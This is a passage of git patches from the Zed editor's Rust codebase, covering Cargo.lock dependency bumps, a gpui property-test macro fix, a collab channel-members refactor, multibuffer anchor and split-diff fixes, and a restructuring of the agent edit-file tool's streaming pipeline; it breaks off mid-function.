"pin-project-lite", "signal-hook-registry", - "socket2 0.6.1", + "socket2 0.6.3", "tokio-macros", "windows-sys 0.61.2", ] @@ -18207,9 +18225,9 @@ dependencies = [ [[package]] name = "tokio-macros" -version = "2.6.0" +version = "2.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "af407857209536a95c8e56f8231ef2c2e2aff839b22e07a1ffcbc617e9db9fa5" +checksum = "385a6cb71ab9ab790c5fe8d67f1645e6c450a7ce006a33de03daa956cf70a496" dependencies = [ "proc-macro2", "quote", @@ -18238,11 +18256,11 @@ dependencies = [ [[package]] name = "tokio-rustls" -version = "0.26.2" +version = "0.26.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8e727b36a1a0e8b74c376ac2211e40c2c8af09fb4013c60d910495810f008e9b" +checksum = "1729aa945f29d91ba541258c8df89027d5792d85a8841fb65e8bf0f4ede4ef61" dependencies = [ - "rustls 0.23.33", + "rustls 0.23.40", "tokio", ] @@ -18302,19 +18320,19 @@ checksum = "d25a406cddcc431a75d3d9afc6a7c0f7428d4891dd973e4d54c56b46127bf857" dependencies = [ "futures-util", "log", - "rustls 0.23.33", - "rustls-native-certs 0.8.2", + "rustls 0.23.40", + "rustls-native-certs 0.8.3", "rustls-pki-types", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tungstenite 0.28.0", ] [[package]] name = "tokio-util" -version = "0.7.16" +version = "0.7.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "14307c986784f72ef81c89db7d9e28d6ac26d16213b109ea501696195e6e3ce5" +checksum = "9ae9cec805b01e8fc3fd2fe289f89149a9b66dd16786abd8b19cfa7b48cb0098" dependencies = [ "bytes 1.11.1", "futures-core", @@ -18945,7 +18963,7 @@ dependencies = [ "http 0.2.12", "httparse", "log", - "rand 0.8.5", + "rand 0.8.6", "sha1", "thiserror 1.0.69", "url", @@ -18964,7 +18982,7 @@ dependencies = [ "http 1.3.1", "httparse", "log", - "rand 0.8.5", + "rand 0.8.6", "sha1", "thiserror 1.0.69", "url", @@ -18982,8 +19000,8 @@ dependencies = [ "http 1.3.1", "httparse", "log", - "rand 0.9.3", - "rustls 0.23.33", + "rand 0.9.4", + "rustls 0.23.40", "rustls-pki-types", "sha1", "thiserror 2.0.17", @@ -19001,8 +19019,8 @@ dependencies = [ "http 1.3.1", "httparse", "log", - "rand 0.9.3", - "rustls 0.23.33", + "rand 0.9.4", + "rustls 0.23.40", "rustls-pki-types", "sha1", "thiserror 2.0.17", @@ -19340,7 +19358,7 @@ dependencies = [ "nix 0.29.0", "percent-encoding", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "regex", "rust-embed", "schemars 1.0.4", @@ -20740,7 +20758,7 @@ version = "0.1.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" dependencies = [ - "windows-sys 0.61.2", + "windows-sys 0.48.0", ] [[package]] @@ -21966,7 +21984,7 @@ dependencies = [ "paths", "postage", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "rpc", "serde", "serde_json", @@ -22221,11 +22239,11 @@ dependencies = [ "js-sys", "nom 8.0.0", "pin-project", - "rand 0.8.5", + "rand 0.8.6", "sha1", "thiserror 1.0.69", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tokio-util", "url", "wasm-bindgen", @@ -22572,7 +22590,7 @@ dependencies = [ "http-body 1.0.1", "http-body-util", "hyper 1.7.0", - "hyper-rustls 0.27.7", + "hyper-rustls 0.27.9", "hyper-util", "ipnet", "js-sys", @@ -22583,8 +22601,8 @@ dependencies = [ "percent-encoding", "pin-project-lite", "quinn", - "rustls 0.23.33", - "rustls-native-certs 0.8.2", + "rustls 0.23.40", + "rustls-native-certs 0.8.3", "rustls-pemfile 2.2.0", "rustls-pki-types", "serde", @@ -22593,7 +22611,7 @@ dependencies = [ "sync_wrapper 1.0.2", "system-configuration 0.6.1", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tokio-socks", "tokio-util", "tower 0.5.2", @@ -22616,7 +22634,7 @@ dependencies = [ "core-graphics-helmer-fork", "log", "objc", - "rand 0.8.5", + "rand 0.8.6", "screencapturekit", "screencapturekit-sys", "sysinfo 0.31.4", @@ -22815,7 +22833,7 @@ dependencies = [ "num-traits", "once_cell", "parking_lot", - "rand 0.9.3", + "rand 0.9.4", "regex", "scc", "thiserror 1.0.69", From e10f0f11fc9eb97ca550872a81fcc9736a4dee36 Mon Sep 17 00:00:00 2001 From: Cameron Mcloughlin Date: Mon, 4 May 2026 12:43:06 +0100 Subject: [PATCH 161/231] gpui: Preserve test return type in gpui::property_test macro (#55622) Proptest allows returning `Result<(), TestCaseError>` , but we were swallowing return values, causing spurious test successes if using `prop_assume!`, `prop_assert!`, etc. These would have given an "unused `Result`" warning. Release Notes: - N/A or Added/Fixed/Improved ... --- crates/gpui_macros/src/property_test.rs | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/crates/gpui_macros/src/property_test.rs b/crates/gpui_macros/src/property_test.rs index 2c7ed0ee0dc138..fe1585cc0672a1 100644 --- a/crates/gpui_macros/src/property_test.rs +++ b/crates/gpui_macros/src/property_test.rs @@ -23,6 +23,7 @@ pub fn test(args: TokenStream, item: TokenStream) -> TokenStream { }; let test_name = func.sig.ident.clone(); + let test_ret_ty = func.sig.output.clone(); let inner_fn_name = format_ident!("__{test_name}"); let outer_fn_attributes = &func.attrs; @@ -50,14 +51,16 @@ pub fn test(args: TokenStream, item: TokenStream) -> TokenStream { let run_test_body = match &asyncness { None => quote! { #cx_vars - #inner_fn_name(#inner_args); + let result = #inner_fn_name(#inner_args); #cx_teardowns + result }, Some(_) => quote! { let foreground_executor = gpui::ForegroundExecutor::new(std::sync::Arc::new(dispatcher.clone())); #cx_vars - foreground_executor.block_test(#inner_fn_name(#inner_args)); + let result = foreground_executor.block_test(#inner_fn_name(#inner_args)); #cx_teardowns + result }, }; @@ -68,12 +71,12 @@ pub fn test(args: TokenStream, item: TokenStream) -> TokenStream { #fixed_macro_invocation #(#outer_fn_attributes)* - fn #test_name(#proptest_args) { + fn #test_name(#proptest_args) #test_ret_ty { #inner_fn ::gpui::run_test_once( __seed, - Box::new(move |dispatcher| { + Box::new(move |dispatcher| #test_ret_ty { #run_test_body }), ) From 8325c918bf12a8275cf656d412ba5d2a6b8f721b Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Mon, 4 May 2026 13:51:56 +0200 Subject: [PATCH 162/231] collab: Stop mixing concerns in `get_channel_participant_details` (#55568) This PR updates the `get_channel_participant_details` method to reduce the mixing of concerns within the method. The authorization check for the caller has been moved to the outside, along with the conversions from the database representations to the RPC proto representations. Now the method is just responsible for dealing with the data fetching, which will make it easier to swap out. Release Notes: - N/A --- crates/collab/src/db/queries/channels.rs | 33 ++----- crates/collab/src/db/tables/channel_member.rs | 16 ++++ crates/collab/src/db/tables/user.rs | 15 ++++ crates/collab/src/rpc.rs | 11 ++- .../integration/db_tests/channel_tests.rs | 87 +++++++++++-------- 5 files changed, 100 insertions(+), 62 deletions(-) diff --git a/crates/collab/src/db/queries/channels.rs b/crates/collab/src/db/queries/channels.rs index 7262a5fa40ff7b..7b435ba1aa2bff 100644 --- a/crates/collab/src/db/queries/channels.rs +++ b/crates/collab/src/db/queries/channels.rs @@ -2,7 +2,7 @@ use super::*; use anyhow::Context as _; use rpc::{ ErrorCode, ErrorCodeExt, - proto::{ChannelBufferVersion, VectorClockEntry, channel_member::Kind}, + proto::{ChannelBufferVersion, VectorClockEntry}, }; use sea_orm::{ActiveValue, DbBackend, TryGetableMany}; @@ -687,16 +687,12 @@ impl Database { /// Returns the details for the specified channel member. pub async fn get_channel_participant_details( &self, - channel_id: ChannelId, + channel: &Channel, filter: &str, limit: u64, - user_id: UserId, - ) -> Result<(Vec, Vec)> { + ) -> Result<(Vec, Vec)> { let members = self .transaction(move |tx| async move { - let channel = self.get_channel_internal(channel_id, &tx).await?; - self.check_user_is_channel_participant(&channel, user_id, &tx) - .await?; let mut query = channel_member::Entity::find() .find_also_related(user::Entity) .filter(channel_member::Column::ChannelId.eq(channel.root_id())); @@ -726,32 +722,15 @@ impl Database { }) .await?; - let mut users: Vec = Vec::with_capacity(members.len()); + let mut users: Vec = Vec::with_capacity(members.len()); let members = members .into_iter() .map(|(member, user)| { if let Some(user) = user { - users.push(proto::User { - id: user.id.to_proto(), - avatar_url: format!( - "https://avatars.githubusercontent.com/u/{}?s=128&v=4", - user.github_user_id - ), - github_login: user.github_login, - name: user.name, - }) - } - proto::ChannelMember { - role: member.role.into(), - user_id: member.user_id.to_proto(), - kind: if member.accepted { - Kind::Member - } else { - Kind::Invitee - } - .into(), + users.push(user) } + member }) .collect(); diff --git a/crates/collab/src/db/tables/channel_member.rs b/crates/collab/src/db/tables/channel_member.rs index a00a380d55941c..7116b92ab63c28 100644 --- a/crates/collab/src/db/tables/channel_member.rs +++ b/crates/collab/src/db/tables/channel_member.rs @@ -1,4 +1,5 @@ use crate::db::{ChannelId, ChannelMemberId, ChannelRole, UserId, channel_member}; +use rpc::proto; use sea_orm::entity::prelude::*; #[derive(Clone, Debug, PartialEq, Eq, DeriveEntityModel)] @@ -12,6 +13,21 @@ pub struct Model { pub role: ChannelRole, } +impl From for proto::ChannelMember { + fn from(member: Model) -> Self { + Self { + role: member.role.into(), + user_id: member.user_id.to_proto(), + kind: if member.accepted { + proto::channel_member::Kind::Member + } else { + proto::channel_member::Kind::Invitee + } + .into(), + } + } +} + impl ActiveModelBehavior for ActiveModel {} #[derive(Copy, Clone, Debug, EnumIter, DeriveRelation)] diff --git a/crates/collab/src/db/tables/user.rs b/crates/collab/src/db/tables/user.rs index 68044bc4429937..933e78ed426984 100644 --- a/crates/collab/src/db/tables/user.rs +++ b/crates/collab/src/db/tables/user.rs @@ -1,5 +1,6 @@ use crate::db::UserId; use chrono::NaiveDateTime; +use rpc::proto; use sea_orm::entity::prelude::*; use serde::Serialize; @@ -30,6 +31,20 @@ impl From for crate::entities::User { } } +impl From for proto::User { + fn from(user: Model) -> Self { + Self { + id: user.id.to_proto(), + avatar_url: format!( + "https://avatars.githubusercontent.com/u/{}?s=128&v=4", + user.github_user_id + ), + github_login: user.github_login, + name: user.name, + } + } +} + #[derive(Copy, Clone, Debug, EnumIter, DeriveRelation)] pub enum Relation { #[sea_orm(has_one = "super::room_participant::Entity")] diff --git a/crates/collab/src/rpc.rs b/crates/collab/src/rpc.rs index 4c38887b5412dd..39f442bcafd9d8 100644 --- a/crates/collab/src/rpc.rs +++ b/crates/collab/src/rpc.rs @@ -3160,9 +3160,18 @@ async fn get_channel_members( } else { request.limit }; + + let channel = db.get_channel(channel_id, session.user_id()).await?; + let (members, users) = db - .get_channel_participant_details(channel_id, &request.query, limit, session.user_id()) + .get_channel_participant_details(&channel, &request.query, limit) .await?; + let members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect(); + let users = users.into_iter().map(proto::User::from).collect(); + response.send(proto::GetChannelMembersResponse { members, users })?; Ok(()) } diff --git a/crates/collab/tests/integration/db_tests/channel_tests.rs b/crates/collab/tests/integration/db_tests/channel_tests.rs index c78fe0f4ef71f7..473225fc762713 100644 --- a/crates/collab/tests/integration/db_tests/channel_tests.rs +++ b/crates/collab/tests/integration/db_tests/channel_tests.rs @@ -1,6 +1,6 @@ use super::{assert_channel_tree_matches, channel_tree, new_test_user}; use crate::test_both_dbs; -use collab::db::{Channel, ChannelId, ChannelRole, Database, NewUserParams, RoomId, UserId}; +use collab::db::{Channel, ChannelId, ChannelRole, Database, NewUserParams, RoomId}; use rpc::{ ConnectionId, proto::{self, reorder_channel}, @@ -36,14 +36,12 @@ async fn test_channels(db: &Arc) { .await .unwrap(); + let replace_channel = db.get_channel(replace_id, a_id).await.unwrap(); let (members, _) = db - .get_channel_participant_details(replace_id, "", 10, a_id) + .get_channel_participant_details(&replace_channel, "", 10) .await .unwrap(); - let ids = members - .into_iter() - .map(|m| UserId::from_proto(m.user_id)) - .collect::>(); + let ids = members.into_iter().map(|m| m.user_id).collect::>(); assert_eq!(ids, &[a_id, b_id]); let rust_id = db.create_root_channel("rust", a_id).await.unwrap(); @@ -158,17 +156,17 @@ async fn test_channel_invites(db: &Arc) { let user_2 = new_test_user(db, "user2@example.com").await; let user_3 = new_test_user(db, "user3@example.com").await; - let channel_1_1 = db.create_root_channel("channel_1", user_1).await.unwrap(); + let channel_1_1_id = db.create_root_channel("channel_1", user_1).await.unwrap(); let channel_1_2 = db.create_root_channel("channel_2", user_1).await.unwrap(); - db.invite_channel_member(channel_1_1, user_2, user_1, ChannelRole::Member) + db.invite_channel_member(channel_1_1_id, user_2, user_1, ChannelRole::Member) .await .unwrap(); db.invite_channel_member(channel_1_2, user_2, user_1, ChannelRole::Member) .await .unwrap(); - db.invite_channel_member(channel_1_1, user_3, user_1, ChannelRole::Admin) + db.invite_channel_member(channel_1_1_id, user_3, user_1, ChannelRole::Admin) .await .unwrap(); @@ -180,7 +178,7 @@ async fn test_channel_invites(db: &Arc) { .into_iter() .map(|channel| channel.id) .collect::>(); - assert_eq!(user_2_invites, &[channel_1_1, channel_1_2]); + assert_eq!(user_2_invites, &[channel_1_1_id, channel_1_2]); let user_3_invites = db .get_channels_for_user(user_3) @@ -190,13 +188,17 @@ async fn test_channel_invites(db: &Arc) { .into_iter() .map(|channel| channel.id) .collect::>(); - assert_eq!(user_3_invites, &[channel_1_1]); + assert_eq!(user_3_invites, &[channel_1_1_id]); - let (mut members, _) = db - .get_channel_participant_details(channel_1_1, "", 100, user_1) + let channel_1_1 = db.get_channel(channel_1_1_id, user_1).await.unwrap(); + let (members, _) = db + .get_channel_participant_details(&channel_1_1, "", 100) .await .unwrap(); - + let mut members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect::>(); members.sort_by_key(|member| member.user_id); assert_eq!( members, @@ -219,19 +221,24 @@ async fn test_channel_invites(db: &Arc) { ] ); - db.respond_to_channel_invite(channel_1_1, user_2, true) + db.respond_to_channel_invite(channel_1_1_id, user_2, true) .await .unwrap(); - let channel_1_3 = db - .create_sub_channel("channel_3", channel_1_1, user_1) + let channel_1_3_id = db + .create_sub_channel("channel_3", channel_1_1_id, user_1) .await .unwrap(); + let channel_1_3 = db.get_channel(channel_1_3_id, user_1).await.unwrap(); let (members, _) = db - .get_channel_participant_details(channel_1_3, "", 100, user_1) + .get_channel_participant_details(&channel_1_3, "", 100) .await .unwrap(); + let members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect::>(); assert_eq!( members, &[ @@ -727,13 +734,16 @@ async fn test_user_is_channel_participant(db: &Arc) { .await .unwrap(); - let (mut members, _) = db - .get_channel_participant_details(public_channel_id, "", 100, admin) + let public_channel = db.get_channel(public_channel_id, admin).await.unwrap(); + let (members, _) = db + .get_channel_participant_details(&public_channel, "", 100) .await .unwrap(); - + let mut members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect::>(); members.sort_by_key(|member| member.user_id); - assert_eq!( members, &[ @@ -803,13 +813,16 @@ async fn test_user_is_channel_participant(db: &Arc) { .is_err() ); - let (mut members, _) = db - .get_channel_participant_details(public_channel_id, "", 100, admin) + let public_channel = db.get_channel(public_channel_id, admin).await.unwrap(); + let (members, _) = db + .get_channel_participant_details(&public_channel, "", 100) .await .unwrap(); - + let mut members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect::>(); members.sort_by_key(|member| member.user_id); - assert_eq!( members, &[ @@ -840,13 +853,16 @@ async fn test_user_is_channel_participant(db: &Arc) { .unwrap(); // currently people invited to parent channels are not shown here - let (mut members, _) = db - .get_channel_participant_details(public_channel_id, "", 100, admin) + let public_channel = db.get_channel(public_channel_id, admin).await.unwrap(); + let (members, _) = db + .get_channel_participant_details(&public_channel, "", 100) .await .unwrap(); - + let mut members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect::>(); members.sort_by_key(|member| member.user_id); - assert_eq!( members, &[ @@ -910,13 +926,16 @@ async fn test_user_is_channel_participant(db: &Arc) { .await .unwrap(); - let (mut members, _) = db - .get_channel_participant_details(public_channel_id, "", 100, admin) + let public_channel = db.get_channel(public_channel_id, admin).await.unwrap(); + let (members, _) = db + .get_channel_participant_details(&public_channel, "", 100) .await .unwrap(); - + let mut members = members + .into_iter() + .map(proto::ChannelMember::from) + .collect::>(); members.sort_by_key(|member| member.user_id); - assert_eq!( members, &[ From 4071f0d7ba26563b211ab5a2fef96970493295e1 Mon Sep 17 00:00:00 2001 From: Cole Miller Date: Mon, 4 May 2026 07:56:06 -0400 Subject: [PATCH 163/231] Fix mismatched excerpts in split agent diff (#55629) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed excerpts not matching in the agent diff when in the split view. --- crates/agent_ui/src/agent_diff.rs | 28 +++++++++++++--------------- crates/editor/src/split.rs | 12 ++++++++++++ 2 files changed, 25 insertions(+), 15 deletions(-) diff --git a/crates/agent_ui/src/agent_diff.rs b/crates/agent_ui/src/agent_diff.rs index 04951fcbe7c8f2..4a5771fd9810fe 100644 --- a/crates/agent_ui/src/agent_diff.rs +++ b/crates/agent_ui/src/agent_diff.rs @@ -173,19 +173,17 @@ impl AgentDiffPane { .map(|diff_hunk| diff_hunk.buffer_range.to_point(&snapshot)) .collect::>(); - let (was_empty, is_excerpt_newly_added) = - self.multibuffer.update(cx, |multibuffer, cx| { - let was_empty = multibuffer.is_empty(); - let is_excerpt_newly_added = multibuffer.update_excerpts_for_path( - path_key.clone(), - buffer.clone(), - diff_hunk_ranges, - multibuffer_context_lines(cx), - cx, - ); - multibuffer.add_diff(diff_handle.clone(), cx); - (was_empty, is_excerpt_newly_added) - }); + let was_empty = self.multibuffer.read(cx).is_empty(); + let is_excerpt_newly_added = self.editor.update(cx, |editor, cx| { + editor.update_excerpts_for_path( + path_key.clone(), + buffer.clone(), + diff_hunk_ranges, + multibuffer_context_lines(cx), + diff_handle.clone(), + cx, + ) + }); let rhs_editor = self.editor.read(cx).rhs_editor().clone(); rhs_editor.update(cx, |editor, cx| { @@ -216,9 +214,9 @@ impl AgentDiffPane { }); } - self.multibuffer.update(cx, |multibuffer, cx| { + self.editor.update(cx, |editor, cx| { for buffer_id in buffers_to_delete { - multibuffer.remove_excerpts_for_buffer(buffer_id, cx); + editor.remove_excerpts_for_buffer(buffer_id, cx); } }); diff --git a/crates/editor/src/split.rs b/crates/editor/src/split.rs index 42f485a236b40c..8f7ef224c53388 100644 --- a/crates/editor/src/split.rs +++ b/crates/editor/src/split.rs @@ -1280,6 +1280,18 @@ impl SplittableEditor { } } } + + pub fn remove_excerpts_for_buffer( + &mut self, + buffer_id: BufferId, + cx: &mut Context<'_, SplittableEditor>, + ) { + let snapshot = self.rhs_multibuffer.read(cx).snapshot(cx); + let Some(path) = snapshot.path_for_buffer(buffer_id) else { + return; + }; + self.remove_excerpts_for_path(path.clone(), cx); + } } #[cfg(test)] From 35cfa71e7f2e3256487776efc9a8004e76896bb2 Mon Sep 17 00:00:00 2001 From: Cole Miller Date: Mon, 4 May 2026 08:46:03 -0400 Subject: [PATCH 164/231] Fix panic in `multi_buffer::Anchor::is_valid` (#55644) We check `is_valid` by seeking to the first excerpt that is `>=` the anchor, and comparing the anchor to the excerpt's start and end. But we were missing a check for the case where seeking puts us on an excerpt for a different buffer, for example when the anchor to be checked is past the end of the context range for its buffer's last excerpt. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed a panic in multibuffers. --- crates/multi_buffer/src/anchor.rs | 3 ++ crates/multi_buffer/src/multi_buffer_tests.rs | 51 +++++++++++++++++++ 2 files changed, 54 insertions(+) diff --git a/crates/multi_buffer/src/anchor.rs b/crates/multi_buffer/src/anchor.rs index 6a8e3b86af0075..849e9932c2a16e 100644 --- a/crates/multi_buffer/src/anchor.rs +++ b/crates/multi_buffer/src/anchor.rs @@ -232,6 +232,9 @@ impl ExcerptAnchor { let Some(excerpt) = cursor.item() else { return false; }; + if excerpt.buffer_id != buffer_snapshot.remote_id() { + return false; + } let is_valid = self.text_anchor == excerpt.range.context.start || self.text_anchor == excerpt.range.context.end || self.text_anchor.is_valid(&buffer_snapshot); diff --git a/crates/multi_buffer/src/multi_buffer_tests.rs b/crates/multi_buffer/src/multi_buffer_tests.rs index 2f4046b8601f8a..1538c325267094 100644 --- a/crates/multi_buffer/src/multi_buffer_tests.rs +++ b/crates/multi_buffer/src/multi_buffer_tests.rs @@ -6206,3 +6206,54 @@ fn test_resolving_max_anchor_for_buffer(cx: &mut TestAppContext) { assert_eq!(point, Point::new(10, 0)); }) } + +#[gpui::test] +fn test_is_valid_anchor_past_last_excerpt_for_buffer(cx: &mut TestAppContext) { + let buffer_a = cx.new(|cx| Buffer::local("aaa\nbbb\nccc\n", cx)); + buffer_a.update(cx, |buffer, cx| { + let len = buffer.len(); + buffer.edit([(len..len, "ddd\neee\n")], None, cx); + }); + let buffer_b = cx.new(|cx| Buffer::local("xxx\n", cx)); + for line in ["yyy\n", "zzz\n", "www\n", "vvv\n"] { + buffer_b.update(cx, |buffer, cx| { + let len = buffer.len(); + buffer.edit([(len..len, line)], None, cx); + }); + } + + let path_a = PathKey::with_sort_prefix(0, rel_path("aaa.rs").into_arc()); + let path_b = PathKey::with_sort_prefix(1, rel_path("bbb.rs").into_arc()); + + let multibuffer = cx.new(|_| MultiBuffer::new(Capability::ReadWrite)); + + multibuffer.update(cx, |multibuffer, cx| { + multibuffer.set_excerpts_for_path( + path_a.clone(), + buffer_a.clone(), + vec![Point::new(1, 0)..Point::new(2, 3)], + 0, + cx, + ); + multibuffer.set_excerpts_for_path( + path_b.clone(), + buffer_b.clone(), + vec![Point::new(1, 0)..Point::new(3, 3)], + 0, + cx, + ); + }); + + multibuffer.read_with(cx, |multibuffer, cx| { + let snapshot = multibuffer.snapshot(cx); + + let buffer_a_snapshot = buffer_a.read(cx).snapshot(); + let anchor_past_excerpt = buffer_a_snapshot.anchor_after(Point::new(4, 0)); + let mb_anchor = snapshot.anchor_in_buffer(anchor_past_excerpt).unwrap(); + + assert!( + !mb_anchor.is_valid(&snapshot), + "anchor past the last excerpt for its buffer should not be valid" + ); + }); +} From 7d6f8c218f0781c154b9d2a22256a9e811bebde7 Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 4 May 2026 17:45:06 +0200 Subject: [PATCH 165/231] agent: Refactor edit file tool state handling (#55663) Ports some changes introduced in #51165 out to make merge conflicts easier to handle. Splits the `Pipeline` into two separate types for mode edit/write so we don't need to maintain that invariant inside the pipeline/in the parser Also moves the parser to be a submodule of `edit_file_tool` Release Notes: - N/A --- crates/agent/src/tools.rs | 1 - crates/agent/src/tools/edit_file_tool.rs | 555 ++++++++++-------- .../streaming_parser.rs} | 183 +++--- 3 files changed, 393 insertions(+), 346 deletions(-) rename crates/agent/src/tools/{tool_edit_parser.rs => edit_file_tool/streaming_parser.rs} (86%) diff --git a/crates/agent/src/tools.rs b/crates/agent/src/tools.rs index e9596d038faff2..b9db30ce432c28 100644 --- a/crates/agent/src/tools.rs +++ b/crates/agent/src/tools.rs @@ -18,7 +18,6 @@ mod restore_file_from_disk_tool; mod save_file_tool; mod spawn_agent_tool; mod terminal_tool; -mod tool_edit_parser; mod tool_permissions; mod update_plan_tool; mod web_search_tool; diff --git a/crates/agent/src/tools/edit_file_tool.rs b/crates/agent/src/tools/edit_file_tool.rs index e22436c7a80473..a51e9883224a69 100644 --- a/crates/agent/src/tools/edit_file_tool.rs +++ b/crates/agent/src/tools/edit_file_tool.rs @@ -1,13 +1,14 @@ mod reindent; mod streaming_fuzzy_matcher; +mod streaming_parser; use super::restore_file_from_disk_tool::RestoreFileFromDiskTool; use super::save_file_tool::SaveFileTool; -use super::tool_edit_parser::{ToolEditEvent, ToolEditParser}; use crate::ToolInputPayload; use crate::tools::edit_file_tool::{ reindent::{Reindenter, compute_indent_delta}, streaming_fuzzy_matcher::StreamingFuzzyMatcher, + streaming_parser::{EditEvent, StreamingParser, WriteEvent}, }; use crate::{AgentTool, Thread, ToolCallEventStream, ToolInput}; use acp_thread::Diff; @@ -598,16 +599,23 @@ pub struct EditSession { buffer: Entity, old_text: Arc, diff: Entity, - mode: EditFileMode, - parser: ToolEditParser, - pipeline: EditPipeline, - file_changed_since_last_read: bool, + parser: StreamingParser, + pipeline: Pipeline, _finalize_diff_guard: Deferred>, } +enum Pipeline { + Write(WritePipeline), + Edit(EditPipeline), +} + +struct WritePipeline { + content_written: bool, +} + struct EditPipeline { current_edit: Option, - content_written: bool, + file_changed_since_last_read: bool, } enum EditPipelineEntry { @@ -622,14 +630,51 @@ enum EditPipelineEntry { }, } -impl EditPipeline { - fn new() -> Self { - Self { - current_edit: None, - content_written: false, +impl Pipeline { + fn new(mode: EditFileMode, file_changed_since_last_read: bool) -> Self { + match mode { + EditFileMode::Write => Self::Write(WritePipeline { + content_written: false, + }), + EditFileMode::Edit => Self::Edit(EditPipeline { + current_edit: None, + file_changed_since_last_read, + }), } } +} + +impl WritePipeline { + fn process_event( + &mut self, + event: &WriteEvent, + buffer: &Entity, + tool: &EditFileTool, + cx: &mut AsyncApp, + ) { + let WriteEvent::ContentChunk { chunk } = event; + + let (buffer_id, buffer_len) = + buffer.read_with(cx, |buffer, _cx| (buffer.remote_id(), buffer.len())); + let edit_range = if self.content_written { + buffer_len..buffer_len + } else { + 0..buffer_len + }; + + agent_edit_buffer(buffer, [(edit_range, chunk.as_str())], &tool.action_log, cx); + cx.update(|cx| { + tool.set_agent_location( + buffer.downgrade(), + text::Anchor::max_for_buffer(buffer_id), + cx, + ); + }); + self.content_written = true; + } +} +impl EditPipeline { fn ensure_resolving_old_text(&mut self, buffer: &Entity, cx: &mut AsyncApp) { if self.current_edit.is_none() { let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.text_snapshot()); @@ -638,6 +683,199 @@ impl EditPipeline { }); } } + + fn process_event( + &mut self, + event: &EditEvent, + buffer: &Entity, + diff: &Entity, + abs_path: &PathBuf, + tool: &EditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + match event { + EditEvent::OldTextChunk { + chunk, done: false, .. + } => { + log::debug!("old_text_chunk: done=false, chunk='{}'", chunk); + self.ensure_resolving_old_text(buffer, cx); + + if let Some(EditPipelineEntry::ResolvingOldText { matcher }) = + &mut self.current_edit + && !chunk.is_empty() + { + if let Some(match_range) = matcher.push(chunk, None) { + let anchor_range = buffer.read_with(cx, |buffer, _cx| { + buffer.anchor_range_outside(match_range.clone()) + }); + diff.update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); + + cx.update(|cx| { + let position = buffer.read(cx).anchor_before(match_range.end); + tool.set_agent_location(buffer.downgrade(), position, cx); + }); + } + } + } + EditEvent::OldTextChunk { + edit_index, + chunk, + done: true, + } => { + log::debug!("old_text_chunk: done=true, chunk='{}'", chunk); + + self.ensure_resolving_old_text(buffer, cx); + + let Some(EditPipelineEntry::ResolvingOldText { matcher }) = &mut self.current_edit + else { + return Ok(()); + }; + + if !chunk.is_empty() { + matcher.push(chunk, None); + } + let range = extract_match( + matcher.finish(), + buffer, + edit_index, + self.file_changed_since_last_read, + cx, + )?; + + let anchor_range = + buffer.read_with(cx, |buffer, _cx| buffer.anchor_range_outside(range.clone())); + diff.update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); + + let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + + let line = snapshot.offset_to_point(range.start).row; + event_stream.update_fields( + ToolCallUpdateFields::new() + .locations(vec![ToolCallLocation::new(abs_path).line(Some(line))]), + ); + + let buffer_indent = snapshot.line_indent_for_row(line); + let query_indent = text::LineIndent::from_iter( + matcher + .query_lines() + .first() + .map(|s| s.as_str()) + .unwrap_or("") + .chars(), + ); + let indent_delta = compute_indent_delta(buffer_indent, query_indent); + + let old_text_in_buffer = snapshot.text_for_range(range.clone()).collect::(); + + log::debug!( + "edit[{}] old_text matched at {}..{}: {:?}", + edit_index, + range.start, + range.end, + old_text_in_buffer, + ); + + let text_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.text_snapshot()); + self.current_edit = Some(EditPipelineEntry::StreamingNewText { + streaming_diff: StreamingDiff::new(old_text_in_buffer), + edit_cursor: range.start, + reindenter: Reindenter::new(indent_delta), + original_snapshot: text_snapshot, + }); + + cx.update(|cx| { + let position = buffer.read(cx).anchor_before(range.end); + tool.set_agent_location(buffer.downgrade(), position, cx); + }); + } + EditEvent::NewTextChunk { + chunk, done: false, .. + } => { + log::debug!("new_text_chunk: done=false, chunk='{}'", chunk); + + let Some(EditPipelineEntry::StreamingNewText { + streaming_diff, + edit_cursor, + reindenter, + original_snapshot, + .. + }) = &mut self.current_edit + else { + return Ok(()); + }; + + let reindented = reindenter.push(chunk); + if reindented.is_empty() { + return Ok(()); + } + + let char_ops = streaming_diff.push_new(&reindented); + apply_char_operations( + &char_ops, + buffer, + original_snapshot, + edit_cursor, + &tool.action_log, + cx, + ); + + let position = original_snapshot.anchor_before(*edit_cursor); + cx.update(|cx| { + 